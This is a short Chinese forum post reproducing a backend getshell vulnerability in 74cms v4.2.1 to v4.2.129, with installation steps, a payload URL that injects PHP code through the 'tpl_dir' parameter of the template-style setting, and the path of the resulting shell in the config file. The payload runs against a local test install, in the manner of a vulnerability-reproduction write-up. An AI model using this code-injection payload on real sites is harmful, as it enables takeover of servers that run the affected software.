设为首页收藏本站
搜索
Kali笔记»社区 局域网安全 内网安全 74cms v4.2.1-v4.2.129-后台getshell漏洞复现
返回列表 发新帖
查看: 6216|回复: 0

74cms v4.2.1-v4.2.129-后台getshell漏洞复现

[复制链接]
小黄人

105

主题

51

回帖

298

积分

中级会员

积分
298
发表于 2021-1-5 16:25:14 | 显示全部楼层 |阅读模式 来自 甘肃
本帖最后由 小黄人 于 2021-1-5 16:29 编辑

[md]### 环境搭建

1. 先去官网获取 骑士人才系统基础版(安装包)

2.将获取好的包进行安装

![](data/attachment/forum/202101/05/162632dg0506y6d6bqf6zy.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "20200628174551873.png")
### 漏洞复现
**点加工具,点击风格模板**
![](data/attachment/forum/202101/05/162722qbe9n2v0ovbv8dyo.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "20200628174634462.png")

**Payload:**
```
http://127.0.0.1/74cms/index.php ... ;a=set&tpl_dir=,'a',phpinfo(),'
```
**shell地址:**
```
http://127.0.0.1/74cms/Application/Home/Conf/config.php
```
![](data/attachment/forum/202101/05/162855h5255pukpvwnivix.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "aHR0cHM6Ly9ibG9nLnFpYW54aWFvOTk2LmNuLy8vd3AtY29udGVudC91cGxvYWRzLzIwMTkvMTIvMDkv.png")

[/md]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
专业装逼!
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表